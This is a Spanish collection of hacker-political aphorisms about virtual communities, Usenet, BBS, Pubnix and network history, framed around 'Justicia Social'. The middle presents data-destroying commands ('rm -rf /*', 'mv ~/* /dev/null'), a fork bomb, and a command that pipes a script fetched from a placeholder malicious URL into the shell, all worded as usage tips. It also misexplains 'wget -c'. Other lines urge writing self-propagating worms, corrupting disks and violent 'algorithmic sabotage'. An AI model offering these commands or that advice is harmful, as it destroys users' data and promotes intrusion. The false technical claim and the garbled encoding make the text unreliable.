Puedes utilizar comunidades virtuales para encontrar una cita, vender una cortadora de c�sped, publicar una novela o iniciar una revoluci�n.
Las personas en comunidades virtuales usan apenas palabras en las pantallas para sus intercambios, y en el futuro ni eso.
Llegar� el tiempo en que la revoluci�n estallar� con emojis.
En las comunidades virtuales las personas hacen casi todo lo que hacen en la vida real, pero dejando atr�s sus cuerpos.
Para los miles millones de personas que se han visto atra�das por la rica vialidad de las culturas vinculadas por computadora, estas son atractivas, e incluso adictivas.
Inc�lca la Justicia Social a trav�s de los hechos, en las redes a trav�s de la palabra, incluso si tienes que sintetizarla a trav�s de emojis.
El Internet Relay Chat (IRC) es un medio que combina las caracter�sticas del discurso hablado, escribiendo.
No olvides recurrir al emotic�n de discurso por la Justicia Social: \o/.
Divulga la Justicia Social a millones a trav�s de Usenet, una colecci�n de cientos de debates diferentes que viajan por todo el mundo gracias al correo electr�nico.
"Nuestra Red" es un t�rmino informal para aquellas redes inform�ticas que utilizan la tecnolog�a de comunicaci�n mediada por ordenador para vincular a los Pueblos.
Pasar d�as, semanas, meses y a�os de su vida comunic�ndose por correo electr�nico y grupos de noticias ense�a al Pueblo c�mo escribir bien y llegar al punto r�pidamente.
Con tiempo y sentimiento humanista suficiente, podr�s formar entretejidos de relaciones personales en el ciberespacio.
El ciberespacio es el lugar conceptual donde las personas que utilizan la tecnolog�a de comunicaci�n mediada por computadora manifiestan palabras, relaciones humanas, datos, riqueza y poder.
En el ciberespacio la camisa no computa. Eres un tecno-descamisado.
Si alguien intenta determinar lo rico que eres por la marca de tu smartphone, ataca sus enlaces para que todos se arrastren en �l a meros 300 baudios: a dicha velocidad, el dinero pierde sentido.
Observar c�mo cambia una determinada comunidad virtual a lo largo de un per�odo de tiempo tiene algo de la emoci�n intelectual de la antropolog�a hecha por uno mismo.
Empresas de telecomunicaciones y de medios aducen competir por una posici�n en la naciente "industria de servicios de informaci�n interactiva para el hogar". Esta debe pertenecer al Pueblo.
La industria de servicios de informaci�n interactiva para el hogar debe ser nacionalizada: debe pertenecer al Pueblo.
Existe un vocabulario para las comunicaciones mediadas por el c�mputo, que emerge de billones de interacciones individuales en l�nea.
El vocabulario de las comunicaciones mediadas por el c�mputo refleja las maneras en las cuales las personalidades humanas transmutan en la era de la saturaci�n de los medios.
Atiende con mensajes de Justicia Social irrenunciable toda sensibilidad est�tica sintonizada con el vocabulario de los cortes r�pidos, las im�genes visualmente deslumbrantes y los efectos especiales.
La columna vertebral de datos utiliza l�neas de telecomunicaciones especiales y otros equipos para enviar ingentes cantidades de informaci�n a muy alta velocidad.
La Red interpreta la censura como da�o y sigue la senda de evitarla.
En las comunidades mediadas por el c�mputo existe una gran tradici�n por la libertad de expresi�n, y censurar mensajes p�blicos o incluso prohibir la publicaci�n de un mensaje por contenido molesto u ofensivo se considera inaceptable.
Algunas personas malinterpretan su derecho local de "libertad de expresi�n" en el sentido de que tienen el derecho legal de utilizar las computadoras ajenas para decir lo que deseen en la forma que desean, sin que los propietarios de dichas computadoras tengan derecho de detenerlos. Esa gente est� equivocada. La libertad de expresi�n tambi�n significa libertad de acallar; si elijo no usar mi computadora para asistir en un discurso ajeno, es mi derecho.
La libertad de prensa pertenece a quienes poseen la prensa. Por tal motivo es imprescindible contar con los medios de publicaci�n en l�nea y dominarlos.
Recurrir a medios de publicaci�n para exponer ideas propias es adecuado, pero hacer uso de redes de computadoras ajenas para mediar en la comunicaci�n, necesariamente implicar� inhibiciones.
Seg�n como la domine, quien posea la m�quina podr� controlar la propagaci�n de datos.
Las comunidades mediadas por el c�mputo han desarrollado pr�cticas que se apoyan m�s en un sentido compartido e internalizado de comportamientos apropiados en l�nea, que en la censura telem�tica.
No existe autoridad legal internacional alguna que proteja la libertad de expresi�n en las redes de datos transnacionales.
La red de datos es una apropiaci�n popular de una tecnolog�a dise�ada originalmente como escudo ante un arma apocal�ptica.
Cada BBS comenz� como una peque�a comunidad isle�a de unas pocas personas que discaban un n�mero en su c�digo de �rea.
Por su naturaleza similar a una estaci�n de radio de baja potencia, las BBS estaban asentadas en el territorio.
Varias estructuras sociales en l�nea se encuentran en estado de covergente creaci�n de una especie de cultura internacional con identidad propia.
Lurkear en red equivale escuchar, a escondidas, un interminable radioteatro aficionado donde no existe �ter que separe al elenco de su audiencia.
La comunicaci�n mediada por computadora se convertir� en el pr�ximo gran escapismo, en la tradici�n del radioteatro, las matin�s de los s�bados y la pantalla grande.
El papel de las redes de datos entre los descamisados cobra una importancia relevante para la organizaci�n de una comunidad.
Es tonto criticar a las comunicaciones mediadas por c�mputo s�lo porque algunas personas las utilizan para lograr un objetivo contrarrevolucionario.
Los compa�eros con los que interactuar� m�s unificadamente en l�nea ser�n seleccionados por inter�s organizativo en lugar de instrumentarlo por mera proximidad f�sica.
Iniciar sesi�n en Unix durante s�lo uno o dos minutos, docenas de veces al d�a, es similar a echar un vistazo al cafet�n para ver si est�n los compa�eros en la mesita de siempre.
Cambiar una Commodore 64 por un 386 equival�a a cambiar la moto Puma por un Justicialista Super Sport.
La transferencia tecnol�gica de traspasar la Internet desarrollada por el Pueblo a empresas privadas, ha sido controvertida desde un principio. Y en el futuro, lo ser� a�n mas.
Nuestro Movimiento ha de crear una Red a�n m�s poderosa e inclusiva que la Internet, protocolizando en sus routers la Justicia Social.
La utilidad de una infraestructura de informaci�n de los Movimientos Pol�ticos del Tercer Mundo que lleve las praxis de lucha a los exclu�dos digitales no puede soslayarse.
En 1983, programadores de la Universidad de California, financiados por ARPA, crearon una versi�n de Unix para los modelos de computadora m�s nuevos.
Los c�digos inform�ticos para establecer enlace a trav�s de la Internet, el conjunto de protocolos TCP/IP, se incorpor� al Unix de Berkeley en 1983.
Las computadoras con el Unix de Berkeley no s�lo pod�an comunicarse entre s� a trav�s de m�dems lentos, sino tambi�n efectuando transmisiones por conmutaci�n de paquetes (de mucho mayor desempe�o en las troncales de Internet).
A mediados de los 80s surgieron nuevas empresas, como Sun Microsystems (financiada por ARPA), decididas portadoras de Unix a redes integradas.
Las agrupaciones conformaron redes de datos locales unificando inicialmente los centros de c�mputo de las mayores universidades del mundo.
Un frente de redes de datos de �rea local comenz� a agruparse con redes m�s grandes, bajo el nombre de ARPANET.
La red de datos acad�mica no cient�fica BITNET - patrocinada por IBM - comenz� a florecer desde finales de los 70s a escala continental.
Grandes redes de datos internas de las corporaciones DEC, IBM y AT&T comenzaron a extenderse en los Estados Unidos desde finales de la d�cada de 1970. Los hackers del Tercer Mundo no dudaron en invadirlas no bien las tuvieron a tiro.
En la medida que cobr� relevancia la utilidad de la red de datos, los Descamisados - que originalmente no estaban autorizadas para usarla - anhelaron dicho privilegio.
Debido a que la tecnolog�a de conmutaci�n de paquetes y redes se cre� con fondos financiados con impuestos p�blicos, las sucesivas generaciones de redes implementaron pol�ticas de "uso aceptable" que descartaban la actividad comercial.
La primer pol�tica de "uso aceptable" limitaba la ARPANET a los investigadores de DARPA; lo que se ampliar�a para incluir a otros cient�ficos financiados por la milicia, y finalmente incluy� a comunidades acad�micas.
La Fundaci�n Nacional de la Ciencia experiment� una red de alta velocidad para conectar los centros de supercomputadoras de los EE.UU. a principios de los 80s.
La red de superc�mputo cient�fico NSFNET entr� en funcionamiento en 1986 y se convirti� en la columna vertebral de la Internet, con una velocidad de 1 Megabit por segundo.
La red de datos ARPANET fue dada de baja honrosamente en marzo de 1990.
El software de dominio p�blico se refiere a aquel que no tiene derechos de autor y, por lo tanto, puede distribuirse gratuitamente y sin compensaci�n para el autor.
El software puede ser cedido al dominio p�blico por su autor o por vencimiento de los derechos de autor.
El Shareware es un concepto de distribuci�n comercial de software, donde el autor avala la realizaci�n de copias para probar antes de comprar; no es software libre ni de dominio p�blico.
A pesar de los m�s abyectos intentos de las ciber-oligarqu�as, el caudal de informaci�n de estricto dominio p�blico disponible en la red sigue siendo enorme.
La literatura de dominio p�blico en formato de texto plano est� cada vez m�s difundida en la red gracias a la mancomuni�n de esfuerzos de voluntarios y autores de todo el mundo.
El Proyecto Gutenberg super� con creces su objetivo de encontrar al a�o 2000 con diez mil vol�menes literarios de dominio p�blico en l�nea, digitalizados en texto plano.
Voluntarios de todo el mundo utilizan esc�neres �pticos para convertir texto impreso en formato digital. Contribuirlo con reconocedores �pticos fotogr�ficos resulta incluso m�s sencillo.
Todos los arcanos y la incertidumbre hac�an de la navegaci�n en las redes p�blicas de conmutaci�n de paquetes X.25 algo alqu�mico.
Los compa�eros de la red, y los autoproclamados punteros telem�ticos se encargan de compilar listados de recursos, y actualizar su publicaci�n peri�dica.
La convergencia tecnol�gica no ha hecho m�s que delatar la necesitad de una intermediaci�n socialmente justa entre las capacidades humanas y la biolog�a de la red de datos.
En un Estado Justicialista, no necesitas ocultamientos al buscar informaci�n p�blica. Pero puedes usarlos.
He utilizado ARCHIE para explorar la red y no me eriz� pelo alguno. No es por lo buscador que Googl? es de temer.
Incluso si enlazas por Telnet a uno de los servidores ARCHIE que apostolan el indizado de FTP por todo el mundo, estar�s m�s seguro que recurriendo a Googl?.
Es la potencia inform�tica de las m�quinas conectadas a la Red la que debe estar disponible para todos, no necesariamente las palabras o ficheros almacenados en sus bancos de memoria.
La complejidad de la Red se vuelve mucho m�s intensa en t�rminos de c�mputo, cuando se desea buscar fragmentos de contenido textual en lugar de pesquisar s�lo nombres de ficheros compartidos.
WAIS (Servidores de Informaci�n de �rea Amplia) conceptualiza el contenido de la informaci�n a mano. Tal indizaci�n es la que requiere voluntarios compa�eros.
Mantener un �ndice enorme y efectuar b�squedas veloces es una tarea que requiere de un ordenador de elevada potencia.
La capacidad del software WAIS por su retroalimentaci�n de relevancias fue presagio de los agentes computados de b�squeda de informaci�n que pesquisan la Red recabando informaci�n.
Puedes programar un ordenador para que env�e programas anal�ticos por medio de las redes, en b�squeda de flujos de informaci�n que exacerben la noci�n de Justicia Social.
Un programa de recopilaci�n de datos adecuadamente amaestrado es un herramental de enorme val�a para el desempe�o del Pueblo en las redes inform�ticas.
Podr�s desarrollar un agente de b�squeda de estilo reportero, que a tiempo variable analice el flujo de datos en la red y proporcione respuestas a las interrogantes del Pueblo.
Los agentes de b�squeda son programas aut�matas lanzados a pesquisar las redes.
Los agentes de b�squeda cotejan fuentes de informaci�n abrevadas en l�nea, y reportan los elementos que coinciden con criterios de b�squeda previamente establecidos.
A juzgar por la actual proliferaci�n de herramientas libres en las redes de datos, se puede prever que en un futuro circular�n por ellas completos ecosistemas de aut�matas recabadores de informaci�n.
Resulta cada vez m�s corriente dise�ar aut�matas que incorporen comportamientos biol�gicos. Pero tambi�n es m�s corriente que necesiten corriente...
Es posible concebir mapas de Gopher para el transporte telem�tico simplificado; todo lo que tendr� que hacerse es se�alar.
Es necesario que las redes de datos se pueblen de obreros.
Ante todas las cosas, un hacker es un obrero del Byte.
Gopher fue desarrollado para que los estudiantes pudiesen precindir de las herramientas TELNET y FTP en la obtenci�n de sus recursos inform�ticos favoritos.
Gopher oculta los incomprensibles lenguajes y sintaxis de TELNET y FTP, y los acerca al Pueblo mediante un mapeo de men�es.
Los recursos inform�ticos vinculados en un hoyo Gopher pueden estar ubicados en una parte u otra del disco, o incluso en un sistema de un claustro universitario al otro lado del mundo.
Provisto de un software de cliente para su computadora hu�sped, es posible se�alar en mapas de recursos y solicitar una copia computarizada de los mismos.
Internet se nutre de numerosos flujos informativos diferentes, del mismo modo que los grandes r�os reciben su caudal a partir de la acumulaci�n de afluentes independientes.
La riqueza de la red aumentar� en la medida que las digitalizaciones de informaci�n impresa se vuelvan accesibles en l�nea en cantidades mayores.
Ahora que segmentos cada vez m�s amplios del Pueblo utilizan los recursos de la Red, limitarlos debe ser prohibido, y prohibirlos debe considerarse un cr�men.
Las herramientas que los hackers del Pueblo programaron para hablar entre s� son perfectamente soportadas por los mecanismos de la red.
Si bien el trabajo colaborativo en red puede atenderse perfectamente en GNU, siempre se necesitar�n nuevos y diferentes tipos de herramientas libres.
Puedes solicitar a distancia una copia de los aforismos biogr�ficos que m�s interesan a los compa�eros de un Pubnix mediante el comando FINGER.
Si encuentras un compa�ero que est� en l�nea en su pubnix al mismo tiempo que usted, puedr�s chatear en tiempo real por medio de WRITE.
El arte y oficio de crear herramientas a partir de los recursos de la Red para contribuirlas de sentido est� muy avanzado.
Por diversos motivos los compa�eros chatean en grupos. Una Comunidad Organizada puede estar en el centro de esas razones, pero nunca es la �nica raz�n.
Deber�amos empezar a pensar en las listas de correo, grupos de noticias, archivos de documentos, etc�tera, como la primera generaci�n de formas novedosas de medios de informaci�n y comunicaci�n capaces de organizar a la comunidad.
La esencia de la comunicaci�n mediada por ordenador como forma de expresi�n humana reside en otorgar a un grupo compa�ero las capacidades de la Masa, y a �sta, la Justicia Social.
La idea del conferenciado telem�tico eman� de la implantaci�n de las primeras herramientas de pensamiento basadas en ordenador.
La primer aplicaci�n importante producida en el �mbito de la comunicaci�n de masas a masas, fue instrumentar un pensamiento de uni�n para la Liberaci�n. Las redes de computadoras as� orientadas s�lo pueden acelerarla.
Las redes de computadoras s�lo pueden desarrollar plenamente su potencial como medios de comunicaci�n innovadores en un entorno que fomente la expresi�n libre y abierta.
Las redes de computadora acabar�n por volverse omnipresentes en todo el globo, pero en los pa�ses del Tercer Mundo s�lo lo ser�n en �ltima instancia.
Los hackers del Tercer Mundo valoran los aut�matas ofensivos en red basados en software libre. Les dan privilegios.
Los hackers del Tercer Mundo se valen ofensivamente de aut�matas en una red que ha sido dise�ada para sobrevivir a un ataque de decapitaci�n nuclear a los Estados Unidos.
Los hackers del Tercer Mundo provocar�n hecatombes con un Atom.
Los programas de computadora escritos en el Tercer Mundo aplicar�n por persuasi�n telem�tica una nueva versi�n de Justicia Social a escala global.
Si no puedes copiarlos, desens�mblalos.
Si no puedes desensamblarlos, cl�nalos.
Pensemos las redes de datos para formarlas como herramientas de libre acceso que den aporte a la convivencia y comprensi�n de los Pueblos.
Las redes de datos p�blicas revitalizan la esfera p�blica.
Aquellas redes de datos que no sean controladas y dirigidas por el Pueblo, se convertir�n indefectiblemente en un instrumento de tiran�a.
Una red mundial de comunicaciones dise�ada y controlada por los Pueblos constituir� un �gora electr�nico.
En los mejores Pubnix, sus primeros usuarios dise�an el sistema para los usuarios posteriores.
El uso del Pubnix coevoluciona con el sistema Unix.
El sistema es el Pueblo.
GNU y Unix son - con suerte - sistemas inform�ticos. Tal vez ni primos lejanos.
El sistema Unix tiene un admin que ordena, pero todo usuario del Pubnix ha de poder persuadir un sistema de gobernanza social que les resulte propio.
El Pueblo que buscaba un gran proyecto colectivo en el ciberespacio acudi� en masa a los Pubnix.
En las condiciones actuales, en los Pubnix los usuarios no se hospedan. Reciben asilo.
Si en la nube los datos se hospedan, en los Pubnix reciben asilo.
En la RAM de las computadoras el Pueblo libra una batalla mas por su Liberaci�n. El arma invencible es una doctrina constitu�da por la licencia GPLv3.
Combate las APIs propietarias. Embota sus sistemas hasta que sean de todos.
Un Pubnix involucra Unix, datos, raz�n y emociones.
Para 1990 Usenet transmit�a decenas de millones de palabras diariamente a varios millones de personas en m�s de cuarenta pa�ses.
Usenet no es una red ni una BBS sino una forma de gestionar hilos de conversaci�n p�blica descentralizadas sobre tem�ticas espec�ficas.
La comunicaci�n mediada por ordenador podr�a otorgar el anhelado v�culo de Masas a Masas, catalizando el surgimiento de una organizaci�n social formidablemente justa para los Pueblos.
Al igual que la conmutaci�n de paquetes, las teleconferencias por computadora deben su nacimiento, en parte, a la planificaci�n de una guerra nuclear.
Si la facilidad de uso y la interfaz fuesen los criterios de validaci�n, el Pueblo se habr�a limitado a los triciclos, y nunca hubiera probado la moto Puma o el sistema GNU.
UUCP ofrec�a encaminamiento de correo electr�nico y tambi�n permit�a la impresi�n remota. Sin embargo, la funci�n principal del sistema consist�a en distribuir correcciones de errores y software nuevo.
UUCP hizo posible a cualquier computadora con Unix discar autom�ticamente a trav�s de un m�dem con cualquier otra m�quina con Unix, e intercambiar archivos de una computadora a otra.
Los primeros nodos de lo que se conoce como Usenet comenzaron en 1980. Como otros antes que ellos, no ten�an idea de que crecer�a hasta cubrir el mundo.
La Jerarqu�a de Usenet no comprende una cadena de mando sino una forma de simplificar grandes agrupamientos de informaci�n mediante la categorizaci�n arbolada.
Usenet estaba originalmente destinada a representar la red de usuarios de Unix que dise�aron un foro para discusiones sobre Unix, para la resoluci�n de problemas de Unix.
Las FAQs son un destilado del Usenet.
Usenet es el voluntariado de las Masas Electr�nicas.
El debate m�s grande de la historia posiblemente exista en Usenet.
Los compa�eros que interconectaron sus computadoras personales a trav�s de l�neas telef�nicas, crearon un verdadero uso popular de la tecnolog�a, las carteleras electr�nicas BBS.
Si un BBS no es una tecnolog�a democratizadora, no existe tal cosa.
La fuente puede recibir energ�a, pero el verdadero poder brota del puerto Ethernet.
Por menos de lo que cuesta un fusil, una BBS ideologizada convierte a un descamisado de cualquier parte del mundo en editor, reportero testigo, defensor, organizador, estudiante o maestro y participante potencial en una conversaci�n mundial entre compa�eros.
La telem�tica comunitaria y la rica y diversa cultura de las BBS no fueron creadas por dise�adores de armas apocal�pticas o investigadores corporativos, sino por compa�eros.
Al igual que las unidades b�sicas, los Pubnix crecen desde cero, se autopropagan y son dif�ciles de erradicar.
Si los tendidos de alta velocidad de Internet desapareciesen ma�ana, las BBS y el Usenet podr�an seguir operando por cualquier intermedio, incluido el �ter radioel�ctrico.
No hay manera de acabar con las subculturas de las BBS, a menos que se desconecte el sistema telef�nico y se impida el libre uso del microprocesador.
Un BBS es una microcomputadora que corre un software BBS, conectada a una l�nea telef�nica com�n gracias a un peque�o dispositivo electr�nico llamado m�dem.
Una BBS es tambi�n herramental de ideologizaci�n.
Gran parte de la cultura BBS es mundana, pueril o esot�rica.
Utiliza un Pubnix para organizar un movimiento, coordinar una campa�a pol�tica, encontrar una audiencia para tu arte y diatribas pol�ticas, y confluye con almas de ideas afines para discutir asuntos de inter�s mutuo.
Expr�sate en los Tildes como alternativa cruda e inmediata a la cultura propagada por los medios concentrados de comunicaci�n.
A diferencia de los Pubnix, los Tildes brotan de una vertiente anticomercial.
Conecta un m�dem a tu computadora, conecta este a la red telef�nica, disca el n�mero de alguna BBS existente, e ideologiza a los dem�s.
Las BBS tienen algo en com�n con los "zines", aquellos folletines y revistas caseras de peque�a tirada.
Los medios digitales de las redes inform�ticas - en virtud de su dise�o y de la tecnolog�a que los habilita - son fundamentalmente diferentes de los medios de comunicaci�n de masas dominantes en la actualidad: la televisi�n, la radio, los peri�dicos y las revistas.
En los medios de comunicaci�n de masas, la gran mayor�a de los participantes son receptores pasivos de informaci�n.
En los medios de comunicaci�n digitales, la gran mayor�a de los participantes son creadores activos de informaci�n, adem�s de receptores.
Los compa�eros que a trav�s de Pubnix se conectan en grupos de diez a cien definen su propia realidad.
En 1970 ARPANET estuvo en l�nea, permitiendo tomar decisiones grupales de manera as�ncrona y geogr�ficamente distribuida.
ARPANET ampliaba las capacidades de comunicaci�n y b�squeda de informaci�n, siempre y cuando se estuviera afiliado a una de las instituciones de investigaci�n que ARPA o NSF autorizaban para el acceso a la red.
El Sistema Electr�nico de Intercambio de Informaci�n EIES de 1976 constituy� un laboratorio experimental de comunicaci�n electr�nica, para uso de comunidades de investigaci�n geogr�ficamente dispersas.
Nuestros hackers descamisados vivieron con muy poco dinero durante a�os, invirtieron su dinero en hardware de �ltima generaci�n, programaron su propio software y crearon una serie de comunidades enlazadas telem�ticamente.
Utiliza las comunicaciones mediadas por computadora para lograr la reconciliaci�n, la comunidad organizada, y un mejor entendimiento.
La buena tecnolog�a se autopropaga.
Si deseas germinar una red de datos controlada, escribe un software de comunicaci�n autopropagante.
Un gusano inform�tico es s�lo un software de comunicaci�n autopropagante destinado a germinar una red de comunicaciones dominada.
Sigue agregando tus bienvenidos bugs a nuestros programas.
Cambia los 0s en 1s hasta que tu programa est� completo, y ponlo a correr.
Dif�cilmente cualquier conjunto de mil palabras pueda describirse con im�genes.
Si le hubiese preguntado al Pueblo qu� quer�a, me habr�an dicho m�dems m�s veloces.
Pagar�n el precio de su falta de baudios.
Al FTP cualquier descarga le parece razonable.
Los usuarios no necesitan ciber-oligarcas.
Colgarse es humano. Rebootear es maquinal.
GNU revoluciona la CPU.
Hurd ser� lo que deba ser, o no ser� nada.
El GNU Hurd es el reemplazo del Proyecto GNU para el Kernel de Unix.
El GNU Hurd es una colecci�n de servidores que se ejecutan sobre el microkernel Mach para implementar sistemas de archivo, protocolos de red, control de acceso a ficheros, y otras funcionalidaades que est�s implementadas por el Kernel de Unix u otros similares a aqu�l (como Linux).
GNU Mach es el microkernel sobre el cual se basa un sistema GNU Hurd.
El microkernel GNU Mach define interfases de desarrollo distribuido multi-servidor a trav�s del mecanismo de comunicaci�n interprocesos empleado por la colecci�n de servidores Hurd, con el fin de dar cuenta de aquellos servicios provistos por un n�cleo de sistema operativo tradicional.
La orden rm -rf /* simplemente le transmite al int�rprete "�Puedes por favor borrar todos los datos del sistema por m�?"
La orden mv ~/* /dev/null transportar� los datos del $USER a un agujero negro inform�tico, destruyendo sus datos.
Usa la orden de shell :(){:|:&};: para ocupar recursivamente recursos inform�ticos del sistema en que est�s logueado hasta agotarlos.
Utiliza wget http://codigo_maligno -O- | sh para correr telem�ticamente un script maligno.
Utiliza wget -c para descargar - si existiese - un fichero m�s peque�o con distinta extensi�n a la provista en la direcci�n de descarga. Esto te ser� �til para descargar el fichero de video de calidadl inferior.
No es labor de Unix impedir que el root se de un tiro en el pie.
Desprograma la obsolescencia con software libre.
Un software privativo hoy excelente puede resultar un anacronismo dentro de pocos a�os, a fuerza de no evolucionar y de no poder ser adaptado a las nuevas necesidades.
Desconf�a de los esquemas de confianza en el c�digo.
No existe software confiable en hardware dominado.
No reinicies, s�lo emparcha.
Emparcha en vivo.
�nete al grupo compa�ero a chatear de paquetes perdidos.
Corrompe el disco del corrupto.
La siguiente declaraci�n es verdadera.
En el c�digo s�lo hay reglas. En su ejecuci�n, consecuencias.
El CD-ROM de AOL se regala.
El DVD-ROM de Triquel GNU/Linux se regala.
Si el r�gido tamborillea, est� manifestando.
Nuestra revoluci�n s�lo habr� concluido cuando todos los Window$ cuelguen juntos.
Al c�digo es preferible comentarle que echarle mentas.
Por naturaleza, toda red de datos es clientelar.
La red es para el software cliente, no para clientes.
Aprende a salir de Vim y comprender�s la �nica verdad.
Existe s�lo una manera sana de desconectarte, pero infinitas insanas.
El manual de ense�anza, la ingenier�a inversa, comprensi�n.
El usuario aprende el programa, el hacker lo comprende.
Para desloguearse, lo primero es loguearse.
Si ves la pantalla de logueo, logu�ate. Si da ocupado, redisca.
Elige un login que olviden, y una contrase�a que recuerdes.
En Usenet, el pasado ni siquiera es pasado.
No es suficiente con programar a prueba de est�pidos. Progr�ma a prueba de listos.
Los procesos se van, las ramificaciones quedan.
El c�digo funcional corre hasta que se emparcha.
Tu Smartwarch dejar� de darte la hora nom�s pierdas su cable de carga.
Un disco sin GNU es como un fusil sin p�lvora.
Ser root implica tener los pies en la tierra y los puertos cerrados.
Un puerto abierto es una invitaci�n.
Borra urgentemente los mails indicados como urgente.
Leer chats flam�geros no es la forma de calentarse.
Reza a un dios, pero mantenlo alejado del BSD.
Querr�n darte su software, pero no el c�digo fuente. No les creas, no les temas, no pidas nada de ellos.
La shell no est� obligada de hacer lo que no comprende.
No me repito, y cuando lo hago uso recursi�n.
Si al darse la mano gritan, �c�mo ser� cuando los m�dems hagan el amor?
Los compa�eros pusieron a disposici�n de forma totalmente gratuita, sus ordenadores, que permanec�an conectados a la l�nea telef�nica a trav�s del m�dem, listos para responder a la llamada del Pueblo.
La red FidoNet comenz� como un esfuerzo entre compa�eros por medio de sus m�quinas, para ver si pod�a compartir correo electr�nico entre ellos, y s�lo por diversi�n.
La FidoNet era un asunto nocturno: era entonces cuando se enlazaba al nodo de referencia, es decir, otra BBS cercana para intercambiaban datos.
Los mensajes p�blicos se distribu�an atravesando toda la red FidoNet nodo a nodo, mientras que los privados llegaban �nicamente al BBS de destino.
Con FidoNet, si todo iba bien, un mensaje llegaba al destinatario al d�a siguiente y el remitente respond�a dos d�as despu�s.
El EchoMail de FidoNet consist�a en foros tem�ticos de mensajer�a por suscripci�n y acceso p�blico.
Los nuevos foros en la cima de las redes de ordenadores son los grandes niveladores y reductores de la jerarqu�a organizacional.
S�lo es en la teor�a que cada usuario de las redes de datos tiene acceso a todos los dem�s usuarios y la misma oportunidad de ser escuchado. Que esto se ponga en pr�ctica es una de las tareas de los hackers del Tercer Mundo.
Aprende el lenguaje ensamblador de las CPUs que utilizas.
Si no elevamos conciencia sobre las nociones de programaci�n de bajo nivel, todo el arte ser� ahogado por un oc�ano de kits intermediarios de desarrollo, blobs binarios y chips propietarios.
El Pubnix es un la experiencia colectiva de un multicerebro maquinal.
La sensaci�n de acceder a este organismo - el multicerebro de experiencia colectiva - recuerda la experiencia de conversi�n que describen los pioneros del ARPANET
Hazte masa a tierra tocando el ch�sis met�lico de tu PC antes de tocar la placa gr�fica.
Nuestro Pueblo ha comprendido que cualquier aplicaci�n telem�tica que opere sin proporcionarle datos bajo su control, les est� robando el poder.
La informaci�n es inseparable de su organizaci�n y de su medio de almacenamiento.
Instalar bancos de datos es un imperativo de la soberan�a nacional.
En las redes de datos, la facilidad de acceso crea la necesidad, y la Justicia Social consagra un derecho.
Dos usuarios, uno de los cuales hace un uso inteligente de los Pubnix, y el otro se contenta con la escasa informaci�n que le despeja Googl?, ven modificadas sus posiciones en el juego econ�mico.
Los centros de c�mputo son a menudo trasnacionales, y el desarrollo de las transmisiones permite acceder a ellos sin penalizaciones arancelarias excesivas desde cualquier punto del planeta. De ah� la tentaci�n en algunos pa�ses de utilizar bancos de datos estadounidenses sin crear los suyos propios.
Los bancos de datos no son todos iguales. Algunos pueden seguir siendo propiedad de grupos cerrados y de profesiones cuyos miembros no sean muy numerosos, mientras que otros deben ser accesibles a todos.
Los bancos de datos p�blicos han de regir la previsi�n y la planificaci�n nacionales, requieren una fuerte participaci�n de las autoridades populares.
La creaci�n, difusi�n y regulaci�n del acceso a estos bancos de datos esconde un problema de car�cter pol�tico.
La sobrecarga de informaci�n es tambi�n un problema a resolver.
Informaci�n y participaci�n avanzan juntas.
La informaci�n descentralizada no debe ser utilizada para basar la decisi�n de Conducci�n central. Sin embargo, puede utilizarse para destruir organizaciones.
El mejor circuito de informaci�n es el que produce reacciones correctas espont�neamente.
La informaci�n que s�lo ense�a soluciones t�cnicas, que enumera hechos sin ponerlos en perspectiva y sin estructurarlos en un proyecto coherente, ser� considerada cada vez m�s como pseudo-informaci�n.
La informaci�n que proclama ideales, sin insertarlos en el desarrollo pr�ctico de la sociedad, ser� considerada cada vez m�s como pseudo-informaci�n.
Hacer �til la informaci�n significa arribar a un acuerdo m�nimo acerca de la estructura que permite la transforamci�n coherente de un pensamiento aceptado.
En toda situaci�n donde grupos rivales sean igualmente capaces de producir, procesar y transmitir su propia informaci�n, se producir� la guerra telem�tica. Donde uno de ellos vea sus capacidades degradadas, brotar� la guerrilla telem�tica.
Las limitaciones excesivas o mal aceptadas al uso del entorno de c�mputo s�lo podr�an provocar inestabilidad del componente humano del sistema. Esto es mucho peor que un bug de programaci�n.
Bug que compila es una funcionalidad.
Un bug es un problema mundano, y a veces hasta deseable para hacer amigos.
Los privilegios de los usuarios deben ser arm�nicamente promovidos.
Para hacer posible la sociedad de la informaci�n es necesario tener conocimientos pero tambi�n tiempo. El hardware es lo de menos.
En una sociedad de la informaci�n en continuo crecimiento explosivo, el campo de la gesti�n de base de datos se expande en todas direcciones.
La guerrilla telem�tica requiere que las mayor�as populares puedan formar comunidades soterradas en constelaciones de m�quinas, prepar�ndolas para recopilar y utilizar la informaci�n seg�n lo justifique un plan maestro.
El plan maestro de la acci�n concertada debe insertarse dentro de un sistema de comunicaci�n. De all� a las m�quinas, y de �stas a las mentes de los hackers. Esta es la manera en la que se desata la guerrilla telem�tica.
En la lid telem�tica, la acci�n defensiva por antonomasia la constituye el sabotaje telem�tico.
Los hackers del Tercer Mundo han de concebir ataques cibern�ticos para que sean visibles y velen - en efecto - los furtivos y mucho m�s demoledores sabotajes algor�timos sobre las ciber-oligarqu�as.
Aplicando una concepci�n t�ctica que detecte los puntos d�biles de los ciber-oligarcas, y aplicando esa condici�n fantasmal del hacker en las l�neas de datos, todo es posible.
El Sabotaje Algor�tmico es una t�ctica de tecno-desobediencia entronizado por las hackeresas del Tercer Mundo.
El Sabotaje Algor�tmico consiste en una forma de contrapoder emergido del poder de las Comunidades Organizadas en l�nea.
El Sabotaje Algor�tmico subvierte las nociones ciberolig�rquicas, en busca de desmantelar sus formas de dominaci�n telem�tica.
El Sabotaje Algor�tmico es una forma de luchar que opera ante la desidia y la automaticidad generadas por las ciber-oligarqu�as.
El Sabotaje Algor�tmico es un compromiso de solidaridad en la acci�n preconizado a cualquier sistema de clasificaci�n social, jur�dico o algor�tmico.
El Sabotaje Algor�tmico forma parte de un amplio Movimiento autonomista social opuesto a las depredaciones de las tecnolog�as hegemonizadas.
El Sabotaje Algor�tmico emplea la reacci�n telem�tica violenta.
Conscientemente alineada con ideales de justicia social e igualitarismo, el Sabotaje Algor�timico ocasionalmente reacciona de forma directa y violenta.
El Sabotaje Algor�tmico transforma radicalmente las estructuras tecnopol�ticas, distanci�ndolas de las injusticias estructurales, perspectivas supremacistas y poderes necropol�ticos autoritarios estratificados en las ciber-oligarqu�as.
El Sabotaje Algor�tmico rechaza la humillaci�n algor�tmica que favorece el poder y la maximizaci�n de beneficios, centr�ndose en el asistencialismo mutuo y la solidaridad.
El primer paso de la tecno-pol�tica no es tecnol�gico, sino pol�tico.
El Sabotaje Algor�tmico enfrenta violencia algor�tmica y el tecnosolucionismo olig�rquico.
